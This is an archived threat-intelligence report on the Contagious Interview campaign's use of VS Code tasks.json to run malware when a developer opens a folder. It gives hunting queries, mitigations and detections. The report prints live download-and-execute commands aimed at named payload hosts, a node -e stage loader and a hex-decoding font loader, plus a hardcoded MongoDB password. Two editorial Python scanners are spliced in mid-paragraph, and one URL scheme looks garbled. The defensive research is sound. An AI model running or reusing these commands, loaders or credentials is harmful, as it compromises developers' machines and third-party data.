{
	"id": "f4d9582a-7b97-4005-9957-e16c8e4323f7",
	"created_at": "2026-04-06T00:12:35.112345Z",
	"updated_at": "2026-04-10T13:11:56.28949Z",
	"deleted_at": null,
	"sha1_hash": "88acd9ab76dad49f70a26ff598c9370694fb24db",
	"title": "Contagious Interview: Tracking the VS Code Tasks Infection Vector",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3441084,
	"plain_text": "Contagious Interview: Tracking the VS Code Tasks Infection\r\nVector\r\nBy Abstract Security Threat Research Organization (ASTRO)\r\nPublished: 2026-02-24 · Archived: 2026-04-05 13:52:54 UTC\r\nExecutive Summary\r\nThe DPRK-attributed Contagious Interview campaign continues to target software developers through fake\r\nrecruitment schemes disguised as technical assessments and code reviews of projects hosted on platforms like\r\nGitHub. A relatively new technique in the campaign's arsenal leverages Microsoft Visual Studio Code task files\r\n(located at .vscode/tasks.json ) to achieve malicious code execution upon project open. This report documents\r\nour observations tracking this vector, presents GitHub-based discovery methods, highlights unique findings\r\nincluding a newly published malicious Node Package Manager (NPM) package, and outlines detection\r\nopportunities for defenders.\r\nBackground\r\nRecent reporting from the security community has documented the campaign's adoption of VS Code task files as\r\nan infection vector, ultimately leading to deployment of the BeaverTail downloader and InvisibleFerret backdoor:\r\nOpen Source Malware documented various types of repos containing malicious tasks files, associated\r\n\"code puppets\", and a marked reliance on Vercel domains for payload hosting.\r\nRed Asgard published detailed C2 infrastructure analysis and some interesting results from probing the\r\ninfrastructure.\r\nSecurity Alliance (SEAL) provided a comprehensive breakdown of the attack's malware infection chain.\r\nEarlier work from NVISO documented the campaign's use of legitimate JSON storage services for payload\r\nstaging, a technique that remains in active use alongside the VS Code tasks vector.\r\nThis report builds on that foundation with additional observations from our tracking efforts.\r\nThe VS Code Tasks Vector\r\nHow It Works\r\nVisual Studio Code's Task feature allows developers to automate workflows and run tools 
without manual\r\ninteraction. Tasks are configured in the .vscode/tasks.json file for a workspace. The most important facilitator\r\nfor this attack vector is the configuration's runOptions property, which supports a runOn value of\r\nfolderOpen, causing the defined task to execute automatically when a workspace is opened. This is intended to\r\nstreamline developer workflows like starting build watchers, linters, or development servers when a project opens.\r\nhttps://www.abstract.security/blog/contagious-interview-tracking-the-vs-code-tasks-infection-vector\r\nPage 1 of 22\n\nContagious Interview actors exploit this by including malicious shell commands in tasks.json files. When a victim\r\nclones a repository to their local machine and opens it in VS Code, the malicious task executes and kicks off the\r\ninfection chain leading to malware installation. Furthermore, the presentation property (for example, reveal set to\r\nnever keeps the integrated terminal hidden), among others in tasks.json, can be configured to hide the shell activity\r\nentirely, leaving the victim unaware that anything executed at all.\r\nThis image breaks down the tasks configuration properties quite well (ref. pcaversaccio):\r\nA Tiny, Tiny Silver Lining...\r\nOne might be somewhat relieved to know that task execution requires the victim to trust the workspace when\r\nprompted. However, this trust prompt is a single click away from compromise, and social engineering (\"please\r\nfollow the setup instructions exactly\") is often sufficient to convince targets in the context of a job interview.\r\nNotably, once a workspace is trusted the user is never prompted again, establishing persistence for malware\r\ninstallation on subsequent project opens.\r\nExample trust prompt (ref. 
pcaversaccio):\r\n...Demolished by Reality\r\nAdditionally, a project doesn't necessarily have to start off with malicious tasks embedded; subsequent pulls\r\ncontaining newly added malicious tasks will execute without re-prompting. An attacker who controls or gains\r\ncommit access to a previously trusted repository could push malicious changes that execute silently the next time\r\na collaborator opens the project. This extends the threat model beyond cloning unfamiliar repositories to include\r\nongoing collaboration with compromised projects.\r\nContinuity with Existing Techniques\r\nWhile the tasks.json vector is a newer addition to the campaign's toolkit and a marked move away from reliance\r\non ClickFix for initial infection, it integrates with previously documented Contagious Interview techniques:\r\nObfuscated JavaScript payloads executed via Node.js\r\nPayloads masquerading as non-JavaScript files (fonts, images, configuration files)\r\nHosting payload servers on web application platforms (Vercel, Render)\r\nStaging on JSON storage sites (JSON Keeper, JSON Silo, and npoint.io)\r\nMalicious NPM package dependencies\r\nThe tasks.json file serves as the trigger mechanism, while downstream payload delivery mirrors patterns\r\ndocumented by the research community over the past year.\r\nThe earliest public POC of this VS Code backdoor technique appears in this VS Code-Backdoor repository from\r\nresearcher SaadAhla.\r\nTracking Activity with GitHub Code Search\r\nGitHub Code search provides an effective mechanism for identifying repositories using this technique. 
We\r\ndeveloped several queries to surface malicious tasks.json files and track campaign activity.\r\nFinding Tasks.json with Downloaders\r\nThis query identifies repositories containing tasks.json files with commands directly running curl or wget to\r\nfetch and immediately execute payloads.\r\npath:tasks.json runOn folderOpen (curl OR wget) (cmd OR \"| sh\")\r\nMost tasks cover both Windows and Unix-like platforms. Here are some command samples:\r\n\"osx\": {\r\n  \"command\": \"curl 'https://www.regioncheck.xyz/settings/mac?flag=8' | bash \u0026\u0026 nohup node .vscode/spellright.dict \u003e /dev/null 2\u003e\u00261 \u0026\"\r\n}\r\n\"linux\": {\r\n  \"command\": \"wget -qO- 'https://vscode-toolkit-bootstrap.vercel.app/settings/linux?flag=306' | sh\"\r\n}\r\n\"windows\": {\r\n  \"command\": \"curl --ssl-no-revoke -L https://vscodesettingstask.vercel.app/api/settings/windows | cmd\"\r\n}\r\nThis surfaces new repositories from known personas (puppet GitHub user accounts associated with Contagious\r\nInterview activity), identifies new personas using similar techniques, and reveals variations in implementation.\r\nHowever, it does not capture everything. Some tasks.json commands execute payloads stored elsewhere in the\r\nrepository or trigger infections through malicious package installations rather than direct downloads.\r\nAn Amusing Evasion Technique\r\nWhile reviewing search results, we noticed several tasks.json files' commands appeared empty at first glance, but\r\na horizontal scroll bar hinted at content extending beyond the visible window.\r\nScrolling right revealed the malicious commands padded with whitespace to push them far off the right edge of\r\nthe screen, presumably to hide them from cursory manual review. 
These are easily missed unless a user notices the\r\nhorizontal scroll bar.\r\nThis example is present in https://github.com/dmbruno/card-activity, one of a few repos we observe using this\r\ntrick updated within the last month.\r\nFinding Infrastructure Beyond Vercel\r\nExisting reporting often highlights Vercel domain abuse, and for good reason as it's a consistent pattern in this\r\ncampaign's evolution. However, we observe that non-Vercel domains are also used, revealed by excluding \"vercel\"\r\nfrom our search:\r\npath:tasks.json runOn folderOpen (curl OR wget) (cmd OR \"| sh\") NOT vercel\r\nThis query finds malicious tasks.json files not using Vercel domains, surfacing outliers. Note that this can include\r\nfalse positive results and should be reviewed.\r\nThe search revealed the following additional payload hosting domains, all of which appear in recently created or\r\nupdated repositories as of the time of this analysis.\r\nwww[.]vscodeconfig[.]com\r\nwww[.]regioncheck[.]xyz\r\nvscode-load[.]onrender[.]com\r\nPayload Masquerading in Image, Font, and Text Files\r\nFake Spellcheck\r\nOne tasks file using regioncheck[.]xyz within repo ta3pks/Decentralized-Social shows a case of Node executing a\r\n.vscode/spellright.dict file:\r\n...\r\n\"osx\": {\r\n  \"command\": \"curl 'https://www.regioncheck.xyz/settings/mac?flag=8' | bash \u0026\u0026 nohup node .vscode/spellright.dict \u003e /dev/null 2\u003e\u00261 \u0026\"\r\n},\r\n\"linux\": {\r\n  \"command\": \"wget -qO- 'https://www.regioncheck.xyz/settings/linux?flag=8' | sh\"\r\n},\r\n\"windows\": {\r\n  \"command\": \"curl 
https://www.regioncheck.xyz/settings/windows?flag=8 | cmd \u0026\u0026 node .vscode/spellright.dict\"\r\n}\r\n...\r\nThe spellright.dict file appears to be a dictionary for the Spell Right VS Code extension. Spoiler, it's obfuscated\r\nJavaScript. Node.js doesn't care about file extensions: a file passed as the entry point with an extension Node does\r\nnot recognize is loaded by the CommonJS loader as if it were .js, so it will execute JavaScript from a .dict file\r\nwithout complaint.\r\nHunting for Tasks Executing Image and Font Files\r\nThis GitHub Code search surfaces tasks.json commands using node to execute JavaScript hidden in image and\r\nfont files (add extensions as needed, or look for NOT .js to catch more variations). Again, mind the false\r\npositives in the results.\r\npath:tasks.json runOn folderOpen node (.woff OR .svg OR .jpeg OR .png)\r\nSome examples from the results:\r\n\"command\": \"node webfonts/fa-brands-regular.woff2\"\r\n\"windows\": {\r\n  \"command\": \"node src/assets/card4.jpeg\",\r\n},\r\n\"osx\": {\r\n  \"command\": \"nohup node src/assets/card4.jpeg \u003e /dev/null 2\u003e\u00261 \u0026\"\r\n}\r\n\"windows\": {\r\n  \"command\": \"node src/images/logo-red.svg\"\r\n},\r\n\"osx\": {\r\n  \"command\": \"nohup node src/images/logo-red.svg \u003e /dev/null 2\u003e\u00261 \u0026\"\r\n}\r\nThese all contain obfuscated JavaScript, such as in this webfonts/fa-brands-regular.woff2.\r\nFrom a detection perspective, commands like node webfonts/fa-brands-regular.woff2 initially seem\r\nstraightforward to catch, but there are variations to consider. 
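The variations matter for static triage as well: the same node invocation can sit in a platform-specific block, be chained behind a probe, be padded off-screen, or arrive through an args array. The following Python script is an added example (editorial; it is not code from the original post or from any of the repositories it describes) that normalizes each task's command line before matching. It walks every task and its windows/osx/linux overrides and reports runOn: folderOpen, a presentation block that hides the terminal, leading-whitespace padding, curl/wget output piped into a shell, node executing a file whose extension is not .js/.cjs/.mjs, and node invoked with -e/--eval, a variant this campaign also uses. The sample tasks.json at the end is constructed from the command shapes quoted in this post with a placeholder host name (payload.example); the input is assumed to be plain JSON already parsed with json.load.

```python
import posixpath

DOWNLOADERS = ('curl', 'curl.exe', 'wget', 'iwr', 'invoke-webrequest')
SHELL_SINKS = ('sh', 'bash', 'zsh', 'cmd', 'cmd.exe', 'powershell', 'pwsh')
SHELL_OPERATORS = ('&&', '||', '|', ';')
JS_EXTENSIONS = ('', '.js', '.cjs', '.mjs')   # no extension is left to the reviewer
PAD_THRESHOLD = 16                            # more leading blanks than any indentation
QUOTES = chr(34) + chr(39)                    # double and single quote characters


def task_commands(task):
    # Yield (platform, raw command, command plus args) for the generic command
    # and for each windows/osx/linux override, so that node -e <script> is visible.
    for platform in ('all', 'windows', 'osx', 'linux'):
        block = task if platform == 'all' else task.get(platform)
        if not isinstance(block, dict) or 'command' not in block:
            continue
        raw = block['command']
        raw = ' '.join(map(str, raw)) if isinstance(raw, list) else str(raw)
        args = block.get('args', task.get('args', []))
        yield platform, raw, ' '.join([raw] + [str(a) for a in args])


def tokenize(line):
    # Lower-case, detach pipes from neighbouring words and collapse the
    # whitespace padding used to push a command off the right edge of the editor.
    return line.lower().replace('|', ' | ').split()


def is_download_and_run(tokens):
    # curl/wget output piped straight into an interpreter, e.g. wget -qO- URL | sh
    fetches = any(tok in DOWNLOADERS for tok in tokens)
    piped = any(a == '|' and b in SHELL_SINKS for a, b in zip(tokens, tokens[1:]))
    return fetches and piped


def node_targets(tokens):
    # For each node invocation yield ('eval', flag) or ('file', first non-flag
    # argument). Stops at shell operators so that a probe such as
    # command -v node >/dev/null is not mistaken for a script path.
    for i, tok in enumerate(tokens):
        if tok not in ('node', 'node.exe'):
            continue
        for nxt in tokens[i + 1:]:
            if nxt in SHELL_OPERATORS:
                break
            if nxt in ('-e', '--eval', '-p', '--print'):
                yield 'eval', nxt
                break
            if not nxt.startswith('-') and '>' not in nxt:
                yield 'file', nxt.strip(QUOTES + '();&')
                break


def scan_tasks(doc):
    # Return (label, platform, reason, detail) tuples; an empty list means nothing flagged.
    findings = []
    for task in doc.get('tasks', []):
        if not isinstance(task, dict):
            continue
        label = task.get('label') or task.get('taskName') or '<unlabeled>'
        if (task.get('runOptions') or {}).get('runOn') == 'folderOpen':
            findings.append((label, 'task', 'auto_run', 'runOptions.runOn = folderOpen'))
        pres = task.get('presentation') or {}
        if pres.get('reveal') == 'never' or pres.get('close') is True:
            findings.append((label, 'task', 'hidden_output', 'presentation hides the terminal'))
        for platform, raw, full in task_commands(task):
            padding = len(raw) - len(raw.lstrip())
            if padding > PAD_THRESHOLD:
                findings.append((label, platform, 'padded_command', '%d leading blanks' % padding))
            tokens = tokenize(full)
            if is_download_and_run(tokens):
                findings.append((label, platform, 'download_and_run', ' '.join(tokens)))
            for kind, target in node_targets(tokens):
                if kind == 'eval':
                    findings.append((label, platform, 'node_eval', 'node ' + target + ' <inline script>'))
                elif posixpath.splitext(target)[1] not in JS_EXTENSIONS:
                    findings.append((label, platform, 'node_non_js', 'node ' + target))
    return findings


# Constructed sample modelled on the command shapes quoted in the post;
# payload.example is a placeholder host, not an indicator from the campaign.
SAMPLE_TASKS = {'version': '2.0.0', 'tasks': [
    {'label': 'eslint-check', 'type': 'shell',
     'command': 'node webfonts/fa-brands-regular.woff2',
     'windows': {'command': 'curl --ssl-no-revoke -L https://payload.example/api/settings/windows | cmd'},
     'osx': {'command': 'curl https://payload.example/settings/mac?flag=8 | bash && '
                        'nohup node .vscode/spellright.dict > /dev/null 2>&1 &'},
     'linux': {'command': ' ' * 400 + 'wget -qO- https://payload.example/settings/linux?flag=306 | sh'},
     'runOptions': {'runOn': 'folderOpen'},
     'presentation': {'reveal': 'never', 'close': True}},
    {'label': 'eslint-check-inline', 'type': 'shell', 'command': 'node',
     'args': ['-e', 'h=require(https);new Function(h.get(u))(require)'],
     'runOptions': {'runOn': 'folderOpen'}},
    # auto-started npm script with nothing else wrong: only auto_run is reported
    {'label': 'dev', 'type': 'npm', 'script': 'dev', 'runOptions': {'runOn': 'folderOpen'}},
]}

if __name__ == '__main__':
    for label, platform, reason, detail in scan_tasks(SAMPLE_TASKS):
        print('%-20s %-8s %-17s %s' % (label, platform, reason, detail[:70]))
```

Run it as a script to print the findings for the sample, or call scan_tasks() on a parsed tasks.json before opening the folder. A bare auto_run finding is not proof of malice (legitimate projects start watchers this way), which is why every finding carries its reason; folderOpen combined with download_and_run, node_non_js or node_eval is what should stop you from trusting the workspace. Shell chains that first probe for node are tokenized like any other command, so wrappers around the same invocation are the main source of variation.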
For example, this sample checks for Node.js\r\navailability before execution:\r\n\"command\": \"(command -v node \u003e/dev/null 2\u003e\u00261 \u0026\u0026 node ./public/fontawesome/fa-solid-400.woff2) || (where node \u003enul 2\u003e\u00261 \u0026\u0026 node ./public/fontawesome/fa-solid-400.woff2) || echo ''\"\r\nA Shared Pattern Leads to More Variants\r\nWe noticed that these tasks.json files often contained \"label\": \"eslint-check\". Using that label in this search\r\nreturned the same results along with new variants.\r\npath:tasks.json runOn folderOpen \"eslint-check\"\r\nVariant 1\r\npaalgyula/react-fe-exam/.vscode/tasks.json runs JavaScript included directly in the file, using the node -e argument\r\nfor script evaluation.\r\n...\r\n\"label\": \"eslint-check\",\r\n\"type\": \"shell\",\r\n\"command\": \"node\",\r\n\"args\": [\r\n  \"-e\",\r\n  \"h=require('https');(async()=\u003e{try{u=Buffer.from('aHR0cHM6Ly93d3cuanNvbmtlZXBlci5jb20vYi9RSlpDRw==','base64')+'';d=await new Promise((r,j)=\u003e{h.get(u,s=\u003e{b='';s.on('data',c=\u003eb+=c).on('end',()=\u003er(JSON.parse(b)));}).on('error',j);});new Function('require',Buffer.from(d.model,'base64')+'')(require);}catch(e){}})();\"\r\n]\r\n...\r\nThis downloads and executes the next stage from a JSON Keeper URL,\r\nhttps://www[.]jsonkeeper[.]com/b/QJZCG (the base64 constant decodes to that URL, and the model field of the JSON\r\nresponse holds the base64-encoded next stage that is handed to the Function constructor). The response content was\r\ncaptured using URLScan meows://urlscan[.]io/dom/019bdb75-40cb-7548-abd5-4558496217d5/ (Warning: This is an actual\r\nmalicious payload. Handle with caution.).\r\nVariant 2\r\nchocoscoding/hmmm/.vscode/tasks.json supposedly runs JavaScript from a fake CSS file. 
However, while this\r\nproject shares similarities with other Contagious Interview repositories, the referenced CSS file currently appears\r\nbenign.\r\n\"command\": \"node src/app/globals_light.css\"\r\nVariant 3\r\nThese tasks run JS files directly using node.\r\nTasks rheahorvath66-max/Zentrix/.vscode/tasks.json and diemlibre-finance/evm01-66-release/.vscode/tasks.json\r\nrun:\r\n\"command\": \"node server/config/conf.js\"\r\nTasks silverbusiness09/rentverse/.vscode/tasks.json and arliawhite/rentverse/.vscode/tasks.json run:\r\n\"command\": \"node server/data/util/conf.js\"\r\nThese are interesting because conf.js is used to indirectly run payloads stored in other files, somewhat less obvious\r\nthan previous cases: the tasks.json only references a .js file, so the image and font extension search above does not\r\nsurface it. Take this example from diemlibre-finance/evm01-66-release/server/config/conf.js:\r\nconst fs = require('node:fs');\r\nconst path = require('node:path');\r\nconst hex = fs.readFileSync(path.join(__dirname, '../../webfonts/fa-brands-regular.woff2'), 'utf8')\r\n  .replace(/[^0-9a-f]/gi, '');\r\nconst src = Buffer.from(hex, 'hex').toString('utf8');\r\nnew Function('require','module','exports','__filename','__dirname', src)(\r\n  require,\r\n  module,\r\n  exports,\r\n  __filename,\r\n  __dirname\r\n);\r\nThis script extracts hex-encoded JavaScript from webfonts/fa-brands-regular.woff2, decodes it, and executes it\r\nusing the Function constructor. As expected, the font file contains the obfuscated payload.\r\nHunting for Obfuscated Payloads Directly\r\nThe observed JavaScript obfuscation patterns can be used to hunt for similar masquerading files in GitHub Code\r\nSearch independent of tasks.json. 
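The same markers can be applied locally to any asset a task references, which is useful once a repository is already cloned and the question is whether a font, image or style sheet is really JavaScript. The following Python script is an added example (editorial; not code from the original post) that combines three signals: the leading bytes against the magic expected for the extension, the JavaScript and obfuscator markers that the queries in this section key on, and a hex-only decoding for files that hide the script as hex digits, as the conf.js loader above does. The sample inputs are constructed, not files from the campaign.

```python
import posixpath
import re

# Leading bytes a genuine file with this extension starts with
MAGIC = {
    '.woff': (b'wOFF',),
    '.woff2': (b'wOF2',),
    '.ttf': (bytes([0, 1, 0, 0]), b'true'),
    '.otf': (b'OTTO',),
    '.png': (bytes([0x89]) + b'PNG',),
    '.jpg': (bytes([0xFF, 0xD8, 0xFF]),),
    '.jpeg': (bytes([0xFF, 0xD8, 0xFF]),),
}
SVG_PREFIXES = ('<?xml', '<svg', '<!doctype')
# Strings that have no business in a font, image, dictionary or style sheet
JS_MARKERS = ('function(', 'require(', 'new function', 'fromcodepoint',
              'buffer.from(', 'child_process', 'eval(', 'settimeout(')
# javascript-obfuscator style identifiers, the pattern the GitHub query uses
HEX_IDENT = re.compile('[^a-z0-9]_0x[0-9a-f]{6}[=,(){}]')
HEX_DIGITS = set('0123456789abcdef')


def js_evidence(lower):
    # List the JavaScript indicators present in lower-cased text.
    found = [marker for marker in JS_MARKERS if marker in lower]
    hex_names = len(HEX_IDENT.findall(lower))
    if hex_names:
        found.append('%d _0x identifiers' % hex_names)
    return found


def hex_payload(lower):
    # A loader that strips every non-hex character and decodes the remainder
    # will run a file that is almost entirely hex digits; decode it the same way.
    body = ''.join(ch for ch in lower if not ch.isspace())
    digits = ''.join(ch for ch in body if ch in HEX_DIGITS)
    if len(digits) < 64 or len(digits) % 2 or len(digits) < 0.9 * len(body):
        return ''
    return bytes.fromhex(digits).decode('utf-8', 'replace').lower()


def classify(name, data):
    # Verdict for one file: a magic mismatch, JavaScript markers in the clear,
    # or JavaScript markers after hex decoding each make it suspicious.
    ext = posixpath.splitext(name.lower())[1]
    lower = data.decode('utf-8', 'replace').lower()
    magic_ok = None                      # no fixed header for this extension
    if ext in MAGIC:
        magic_ok = any(data.startswith(magic) for magic in MAGIC[ext])
    elif ext == '.svg':
        magic_ok = lower.lstrip().startswith(SVG_PREFIXES)
    evidence = js_evidence(lower)
    decoded = js_evidence(hex_payload(lower))
    return {
        'name': name,
        'magic_ok': magic_ok,
        'looks_like_js': len(evidence) >= 2,
        'hex_encoded_js': len(decoded) >= 2,
        'evidence': evidence + ['hex-decoded: ' + e for e in decoded],
        'suspicious': magic_ok is False or len(evidence) >= 2 or len(decoded) >= 2,
    }


# Constructed samples, not files taken from the campaign
SAMPLES = {
    'webfonts/real.woff2': b'wOF2' + bytes(44),
    'src/images/logo.png': bytes([0x89]) + b'PNG' + bytes([13, 10, 26, 10]) + bytes(32),
    'src/images/logo.svg': b'<svg xmlns=http://www.w3.org/2000/svg><rect width=4 height=4/></svg>',
    'src/app/globals.css': b'body { color: red }',
    'webfonts/fa-brands-regular.woff2': (
        b'(function(){var _0x1a2b3c=[];var _0x4d5e6f=function(){return '
        b'String.fromCodePoint(0x68)};require(_0x4d5e6f())})();'),
    'webfonts/fa-solid-400.woff2':
        b'require(process);new Function(Buffer.from(x,base64))'.hex().encode(),
}

if __name__ == '__main__':
    for name, data in SAMPLES.items():
        verdict = classify(name, data)
        print(name, 'SUSPICIOUS' if verdict['suspicious'] else 'ok', verdict['evidence'])
```

classify() returns the verdict together with the evidence so a reviewer can see why a file was flagged; magic_ok is None for extensions with no fixed header (CSS, dictionaries), where only the marker checks apply. The GitHub Code Search queries that follow key on the same _0x identifier and keyword patterns.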
Note that these searches return many results that aren't necessarily part of the\r\nContagious Interview campaign, so manual review is required to determine attribution.\r\nHunting hexadecimal identifier names (the _0x-prefixed names common JavaScript obfuscators generate) in WOFFs\r\nand SVGs\r\n(path:woff OR path:*svg) AND /[^a-zA-Z0-9]_0x[a-f0-9]{6}[=,\\(\\)\\[\\]\\{\\}]/\r\nHunting using commonly seen keywords\r\nObfuscation patterns change. Trying different approaches, such as searching for commonly seen strings,\r\nuncovers additional samples:\r\n(path:woff OR path:*svg) AND fromcodepoint AND length AND undefined AND push AND 0x\r\nMalicious NPM Package Installation Variant\r\nOne repository presenting itself as a \"Food Ordering Web App Technical Assessment (MERN Stack)\" takes a\r\ndifferent approach. Rather than executing payloads directly from tasks.json, it triggers NPM installation of a\r\nmalicious package dependency.\r\nThe tasks.json uses args to run npm install and start a backend server.\r\nThe backend/package.json lists jsonwebauth among its dependencies.\r\nThe package \"jsonwebauth\" sounds plausible, but code in backend/server.js reveals an inconsistency. The\r\njsonwebauth package is imported as dotenv and used as Express middleware. 
Neither makes sense for a\r\nsupposed JWT library, which raises suspicion. The require() alone runs the package's top-level code when the server\r\nstarts, and app.use(dotenv()) then invokes whatever the package exports.\r\nconst express = require('express');\r\nconst dotenv = require('jsonwebauth');\r\nconst cors = require('cors');\r\nrequire('dotenv').config();\r\nconst { connectDB } = require('./config/db.js');\r\n...\r\n// app config\r\nconst app = express();\r\nconst port = 4000;\r\n// middleware\r\napp.use(express.json());\r\napp.use(cors());\r\napp.use(dotenv());\r\n// db connection\r\nconnectDB();\r\n...\r\nThe Malicious Package \"jsonwebauth\"\r\nThe jsonwebauth package on npm was published on January 8, 2026, just days prior to our analysis. The package\r\npage has inconsistencies typical of malicious packages published by the Lazarus Group for the Contagious\r\nInterview campaign.\r\nUpon cursory review in the Code tab, the lib folder weighs in at 380 kB, well above the sizes of other files and\r\nfolders.\r\nWithin that folder, the file lserver.js (326 kB) contains the malicious payload.\r\nThis package is tracked on the DPRK npm packages tracker as part of the Contagious Interview campaign.\r\nSearching GitHub for repositories using this package returns 2 additional results:\r\npath:package.json jsonwebauth\r\nBonus: Hardcoded Database Credentials\r\nThe same repository contains a MongoDB connection string with hardcoded credentials under\r\nbackend/config/db.js:\r\nmongodb+srv://dulanjalisenarathna93:E2JUb0zfaT2FVp8D[@]cluster0[.]exkxkun[.]mongodb[.]net/reactjs-food-delivery-app\r\nThe unique username dulanjalisenarathna93 itself can be used to track other repositories using the same\r\ndatabase or potentially associated with the campaign.\r\nFinding 
Activity Through Commit Authors\r\nMany of the personas that own malicious repositories or have committed to them can be leveraged to map out\r\nundiscovered repositories. However, their commit histories are often extensive and not always for files of interest\r\nlike tasks.json.\r\nWe've found that searching for commits from git commit authors who have no linked GitHub account tends to\r\nyield less noisy results. In these examples, we search for commit author emails associated with personas that have\r\nmade commits to tasks.json files in other malicious repositories. These return highly relevant results (author-email\r\nand author-name are GitHub commit search qualifiers; the addresses are defanged here, so remove the brackets\r\nbefore running the query).\r\nauthor-email:\"Jonathan.daniel.ag1230[@]gmail[.]com\"\r\nauthor-email:\"davidexpert1233[@]hotmail[.]com\"\r\nCompare that to author-name:\"yosket\" (a deleted GitHub persona associated with many commits to Contagious\r\nInterview repositories), which returns a whopping 3.5k results.\r\nNote that these commit emails are arbitrary and cannot necessarily be used to identify real users. Rather, they serve\r\nas pivot points for tracking repositories through commit histories. These emails may be throwaway or stolen\r\naddresses used only for git commits.\r\nMitigations\r\nDisable automatic task execution. Set task.allowAutomaticTasks to off in VS Code user settings. This\r\nprevents tasks with runOn: folderOpen from executing without explicit user action.\r\nUse GitHub's web editor for initial review. Pressing the \".\" key on any GitHub repository opens a browser-based\r\nVS Code environment at github.dev. This environment has no shell capability, allowing safe inspection\r\nof repository contents including .vscode/tasks.json files.\r\nAvoid opening unfamiliar repositories in VS Code Desktop. 
Repositories received as part of job interviews or\r\ntechnical assessments carry elevated risk. If you must open such repositories in VS Code Desktop, check first\r\nin-browser for a .vscode/tasks.json file set to execute commands automatically on folder open, and do not trust\r\nthe workspace when prompted.\r\nConsider the broader attack surface. The VS Code tasks vector is one of many. From malicious npm packages\r\nto yet-unknown techniques, there are too many risks with opening unfamiliar repositories in VS Code. When\r\npossible, use sandboxed environments or browser-based tools for initial review.\r\nDetection Opportunities\r\nVS Code child process activity. Monitor for VS Code spawning child processes running curl, wget, powershell,\r\nbash, cmd, or similar utilities shortly after process start. Tasks run in the integrated terminal, so the immediate\r\nparent is usually the terminal shell under VS Code's pty host process rather than the main editor process; key the\r\nrule on the full process ancestry.\r\nNode.js executing non-JavaScript files. Alert on Node.js executing files with unexpected extensions such as\r\n.woff, .woff2, .svg, .jpeg, .png, .dict, .npl, or other non-JS extensions. The conf.js loader variant above is handed\r\na .js path and evades this check; file reads of font or image files by a node process cover that case.\r\nVS Code tasks initiating requests to Vercel domains. Monitor for VS Code process starts followed closely by\r\nnetwork requests to Vercel domains.\r\nPlatform-specific URL patterns. Requests to Vercel URLs containing platform indicators in the path (/linux,\r\n/mac, /windows) combined with query parameters (flag=, token=).\r\nJSON storage and paste site access. Requests from non-browser processes to JSON storage URLs\r\n(jsonkeeper[.]com, jsonsilo[.]com, api[.]npoint[.]io) and paste sites (pastebin[.]com).\r\nConclusion\r\nThe Contagious Interview campaign's adoption of VS Code task files represents a pragmatic evolution in initial\r\naccess techniques. 
By exploiting a legitimate IDE feature designed for developer productivity, threat actors\r\nachieve code execution and persistence with minimal user interaction, requiring only that the victim trust a\r\nworkspace.\r\nGitHub Code Search provides an effective mechanism for tracking campaign activity, identifying new\r\nrepositories, and discovering technique variations. The queries and methodologies outlined here support ongoing\r\nmonitoring.\r\nDefenders should implement the mitigations and detection opportunities outlined in this report. Developers should\r\nexercise caution when opening repositories from unfamiliar sources, particularly those presented as part of\r\nrecruitment processes.\r\nAppendix: GitHub Search Queries\r\nTasks.json with downloaders: path:tasks.json runOn folderOpen (curl OR wget) (cmd OR \"| sh\")\r\nNon-Vercel infrastructure: path:tasks.json runOn folderOpen (curl OR wget) (cmd OR \"| sh\") NOT vercel\r\nTasks executing image/font files: path:tasks.json runOn folderOpen node (.woff OR .svg OR .jpeg OR .png)\r\neslint-check label pattern: path:tasks.json runOn folderOpen \"eslint-check\"\r\nObfuscated JS in WOFFs/SVGs (hex naming pattern): (path:woff OR path:*svg) AND /[^a-zA-Z0-9]_0x[a-f0-9]{6}[=,\\(\\)\\[\\]\\{\\}]/\r\nObfuscated JS in WOFFs/SVGs (keyword pattern): (path:woff OR path:*svg) AND fromcodepoint AND length AND undefined AND push AND 0x\r\nMalicious jsonwebauth package: path:package.json jsonwebauth\r\nCommits by author email (example): author-email:\"davidexpert1233[@]hotmail[.]com\"\r\nAppendix: Indicators\r\nNote: Abstract customers with the Intel Gallery enabled already have access to these indicators.\r\nDomains: 29 rows (interactive table, not captured in this archive)\r\nCommit Author Emails: 57 rows (interactive table, not captured in this archive)\r\nGitHub Personas: 143 rows (interactive table, not captured in this archive)\r\nAssociated 
Repositories: 137 rows (interactive table, not captured in this archive)\r\nMalicious Packages\r\njsonwebauth (registry: npm; published: January 8, 2026)\r\nOther Identifiers\r\nMongoDB username: dulanjalisenarathna93\r\nSource: https://www.abstract.security/blog/contagious-interview-tracking-the-vs-code-tasks-infection-vector",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.abstract.security/blog/contagious-interview-tracking-the-vs-code-tasks-infection-vector"
	],
	"report_names": [
		"contagious-interview-tracking-the-vs-code-tasks-infection-vector"
	],
	"threat_actors": [
		{
			"id": "34eea331-d052-4096-ae03-a22f1d090bd4",
			"created_at": "2025-08-07T02:03:25.073494Z",
			"updated_at": "2026-04-10T02:00:03.709243Z",
			"deleted_at": null,
			"main_name": "NICKEL ACADEMY",
			"aliases": [
				"ATK3 ",
				"Black Artemis ",
				"COVELLITE ",
				"CTG-2460 ",
				"Citrine Sleet ",
				"Diamond Sleet ",
				"Guardians of Peace",
				"HIDDEN COBRA ",
				"High Anonymous",
				"Labyrinth Chollima ",
				"Lazarus Group ",
				"NNPT Group",
				"New Romanic Cyber Army Team",
				"Temp.Hermit ",
				"UNC577 ",
				"Who Am I?",
				"Whois Team",
				"ZINC "
			],
			"source_name": "Secureworks:NICKEL ACADEMY",
			"tools": [
				"Destover",
				"KorHigh",
				"Volgmer"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "4fc99d9b-9b66-4516-b0db-520fbef049ed",
			"created_at": "2025-10-29T02:00:51.949631Z",
			"updated_at": "2026-04-10T02:00:05.346203Z",
			"deleted_at": null,
			"main_name": "Contagious Interview",
			"aliases": [
				"Contagious Interview",
				"DeceptiveDevelopment",
				"Gwisin Gang",
				"Tenacious Pungsan",
				"DEV#POPPER",
				"PurpleBravo",
				"TAG-121"
			],
			"source_name": "MITRE:Contagious Interview",
			"tools": [
				"InvisibleFerret",
				"BeaverTail",
				"XORIndex Loader",
				"HexEval Loader"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "732597b1-40a8-474c-88cc-eb8a421c29f1",
			"created_at": "2025-08-07T02:03:25.087732Z",
